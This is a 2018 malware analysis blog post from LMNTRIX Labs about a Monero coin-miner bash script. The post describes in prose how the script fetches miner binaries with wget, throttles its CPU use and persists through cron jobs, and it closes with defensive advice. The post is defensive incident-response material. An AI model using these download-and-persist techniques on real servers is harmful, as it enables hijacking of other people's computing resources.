New Coin Miner Malware Bashes The Unsuspecting

Overview

LMNTRIX Labs has reported multiple coin-miner infections. In the latest trend, we found a Monero XMR bash script that installs itself as cron job and then downloads a malicious executable.  

Here’s the analysis.

BashScript Coin Miner Malware

LMNTRIX Labs researchers discovered a bash script which downloads the coin mining malware.

MD5: eef5cdda9cc6415e94ecdfe1214e732a

Size: 3.65 KB

File Type: Bash Script

 

Figure 1 VT detection for the coin mining bash script

 

Figure 2 Malicious link hosting two coin miner files

The above picture show the relation between the malicious site which hosts two coin miner files which get downloaded by the bash script (transfer.sh). For downloading the files, the script  uses the wget command to pull the files in the victim server.

 

Figure 3 downloading the coin miner files

The following Virustotal links of the 'clay' is a known Trojan. 'Minerd' is, as the name suggests, a crypto miner

https://www.virustotal.com/#/file/260ef4f1bb0e26915a898745be873373f083227a4f996731f9a3885397a49e79/detection

 

Figure 4 CLAY

https://www.virustotal.com/#/file/2d89b48ed09e68b1a228e08fd66508d349303f7dc5a0c26aa5144f69c65ce2f2/detection

 

Figure 5 MINERD

In order to avoid a dependency error, the bash script follows an order of installing all the required files before downloading the coin miner files.

 

Figure 6 to avoid dependency issues - installing all the required programs



Determining the Core – It doesn’t need full core for Mining

This bash script checks the availability of the core in the server. And moreover, if the core is greater than four then coin miner will take half of the resources to avoid consuming the full capacity of the server.

 

Figure 7 Code to determine and consumption of core

Persistency

Cron jobs are created by the script for downloading the original bash script every five hours. The vital step for incident response is that along with malware, you need to make sure that cron job is also removed. Otherwise, even after the removal of all the mining programs from the infected server this tiny cron job will remain persistent. 

Additional Context: Browser Based Coin Miner 

Most coin mining malware seems to focus on Linux based servers. One of the reasons might be that many Linux servers don’t seem to be guarded with a good AV solution. That said, we have seen infections across Windows machines as well

Apart from this mining malware, there is also coin mining malware now in the market which can execute in any environment. It is referred as Coinhive JS, a JavaScript used in a compromised website to perform coin mining activities. In our earlier research, our team analysed CoinHive JavaScript which actually uses the client’s web browser to perform coin mining activity. In this case, resources consumed by the running process appeared to be in web browser.

 

It is worth noting that popular sites like Pirate Bay, Vimshop.win, and showtime have moved away from monetizing with ads in favor of using CoinHive to generate revenue.



Precautionary Steps To Take

LMNTRIX LABS recommends blocking the mining pool sites in the proxy and firewall. It is always recommended to keep the anti-malware solutions in the places like Linux servers with security patches up to date. Additionally, monitoring the health check will provide valuable information on resource utilization level in the servers, and will further help administrators find the presence of malware and the root cause.

 


On 2018-05-01

Privacy Statement | Terms of Use